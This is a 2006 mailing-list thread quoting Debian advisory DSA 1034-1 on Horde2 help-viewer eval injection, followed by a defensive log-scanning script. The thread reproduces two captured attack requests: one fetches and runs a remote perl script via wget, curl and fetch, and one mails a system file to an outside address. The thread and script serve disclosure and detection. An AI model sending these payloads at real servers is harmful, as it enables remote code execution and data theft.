Date: Fri Apr 14 16:07:04 2006
From: nodialtone at comcast.net (Byron Copeland)
Subject: [SECURITY] [DSA 1034-1] New horde2 packages fix several vulnerabilities

Here's another attempt:

GET /horde//services/help/?show=about&module=;%22
.passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47).
%22dary.6te.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net%
22.chr(47).%22h;fetch%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net%22.chr(47).%22h;perl%20h
;rm%20-rf%20h*%22);'. HTTP/1.1" 404 77 "-" "Mozilla/4.0 (compatible;
MSIE 6.0; Windows 98)"

:)


On Fri, 2006-04-14 at 10:49, <...> wrote:
> <from [funsec]>
> (thx Henderson, Dennis K.)
> 
> Which web server would be a target for this GET?
> 
> Not sure what group to post this to but I'm sure having fun watching the
> attempts..
> 
> :)
> 
> 
> 
> 
> GET
> /horde2/services/help/?show=about&module=;%22.passthru(%22cat%20%22.chr(
> 47).%22etc%22.chr(47).%22issue%20%7Cmail%20-s%20ho2%20p0wd3r31337@...il.
> com%22);'. HTTP/1.1
> Accept: */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
> Host: x.x.x.x
> Connection: Close
> 
> </from [funsec]>
> 
> ----- Original Message ----- 
> From: "Moritz Muehlenhoff" <jmm@...ian.org>
> To: <debian-security-announce@...ts.debian.org>
> Sent: Friday, April 14, 2006 4:42 PM
> Subject: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fix several vulnerabilities
> 
> 
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > - --------------------------------------------------------------------------
> > Debian Security Advisory DSA 1034-1                    security@...ian.org
> > http://www.debian.org/security/                         Moritz Muehlenhoff
> > April 14th, 2006                        http://www.debian.org/security/faq
> > - --------------------------------------------------------------------------
> >
> > Package        : horde2
> > Vulnerability  : several
> > Problem-Type   : remote
> > Debian-specific: no
> > CVE ID         : CVE-2006-1260 CVE-2006-1491
> >
> > Several remote vulnerabilities have been discovered in the Horde web
> > application framework, which may lead to the execution of arbitrary
> > web script code. The Common Vulnerabilities and Exposures project
> > identifies the following problems:
> >
> > CVE-2006-1260
> >
> >    Null characters in the URL parameter bypass a sanity check, which
> >    allowed remote attackers to read arbitrary files, which allowed
> >    information disclosure.
> >
> > CVE-2006-1491
> >
> >    User input in the help viewer was passed unsanitised to the eval()
> >    function, which allowed injection of arbitrary web code.
> >
> >
> > The old stable distribution (woody) doesn't contain horde2 packages.
> >
> > For the stable distribution (sarge) these problems have been fixed in
> > version 2.2.8-1sarge2.
> >
> > The unstable distribution (sid) no longer contains horde2 packages.
> >
> > We recommend that you upgrade your horde2 package.
> >
> >
> > Upgrade Instructions
> > - --------------------
> >
> > wget url
> >        will fetch the file for you
> > dpkg -i file.deb
> >        will install the referenced file.
> >
> > If you are using the apt-get package manager, use the line for
> > sources.list as given below:
> >
> > apt-get update
> >        will update the internal database
> > apt-get upgrade
> >        will install corrected packages
> >
> > You may use an automated update by adding the resources from the
> > footer to the proper configuration.
> >
> >
> > Debian GNU/Linux 3.1 alias sarge
> > - --------------------------------
> >
> >  Source archives:
> >
> > 
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.dsc
> >      Size/MD5 checksum:      575 acf3f1924f04e2faddfd06ba9b01820e
> > 
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2.diff.gz
> >      Size/MD5 checksum:    39504 fb338c016b70e69fa4b867fa116b86dc
> > 
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8.orig.tar.gz
> >      Size/MD5 checksum:   683005 89961af4e4488a908147d7b3a0dc3b44
> >
> >  Architecture independent components:
> >
> > 
> > http://security.debian.org/pool/updates/main/h/horde2/horde2_2.2.8-1sarge2_all.deb
> >      Size/MD5 checksum:   721398 35fa1bf8bf8b4f2be1076501b984367a
> >
> >
> >  These files will probably be moved into the stable distribution on
> >  its next update.
> >
> > - ---------------------------------------------------------------------------------
> > For apt-get: deb http://security.debian.org/ stable/updates main
> > For dpkg-ftp: ftp://security.debian.org/debian-security
> > dists/stable/updates/main
> > Mailing list: debian-security-announce@...ts.debian.org
> > Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
> > -----BEGIN PGP SIGNATURE-----
> > Version: GnuPG v1.4.3 (GNU/Linux)
> >
> > iD8DBQFEP7SJXm3vHE4uyloRAsVVAJ4n9UoO57tJYCw1JePujnjy90XFvACg3DLn
> > nrfwvObZjSThW+pXcD8NI38=
> > =BIdm
> > -----END PGP SIGNATURE-----
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> > 

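A defender-side check for the probes quoted in this thread, as an added example that is not part of the original messages or of Horde's code: it scans web server access-log lines for help-viewer requests whose decoded `module` parameter is anything other than a bare application name. The allowlist pattern, the combined log format and the sample entries (documentation IP addresses) are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate help-viewer module value is a bare application name.
SAFE_MODULE = re.compile(r"[A-Za-z0-9_-]+")
REQUEST = re.compile(r"\b(?:GET|POST|HEAD) (?P<target>\S+) HTTP/\d")

# Constructed sample entries (documentation IPs); the second is modeled on the
# probes quoted in this thread, the third hits a different path.
SAMPLE_LOG = """\
192.0.2.10 - - [14/Apr/2006:10:01:02 +0000] "GET /horde/services/help/?show=about&module=imp HTTP/1.1" 200 1532 "-" "Mozilla/4.0"
192.0.2.77 - - [14/Apr/2006:10:03:40 +0000] "GET /horde//services/help/?show=about&module=;%22.passthru(%22cat%20%22.chr(47).%22etc%22.chr(47).%22issue%22);'. HTTP/1.1" 404 77 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
192.0.2.10 - - [14/Apr/2006:10:05:11 +0000] "GET /horde/index.php?module=;x HTTP/1.1" 200 900 "-" "Mozilla/4.0"
"""


def module_values(target):
    """Decoded 'module' values of a help-viewer request; [] for other paths."""
    path, _, query = target.partition("?")
    path = re.sub(r"/{2,}", "/", path)  # probes use /horde//services/help/
    if not path.rstrip("/").endswith("/services/help"):
        return []
    values = []
    for pair in query.split("&"):  # split on '&' only: the payload contains ';'
        name, _, value = pair.partition("=")
        if name == "module":
            values.append(unquote(value))
    return values


def scan(lines):
    """Return (client, decoded_module) for every value outside the allowlist."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        for value in module_values(m.group("target")):
            if not SAFE_MODULE.fullmatch(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG.splitlines()):
        print(f"{client}\tmodule={value!r}")
```

A flagged request answered with 404, as in the first entry quoted in the thread, hit a path that does not exist on that host; a flagged request answered with 200 is a reason to confirm the installed horde2 package is at the fixed version 2.2.8-1sarge2.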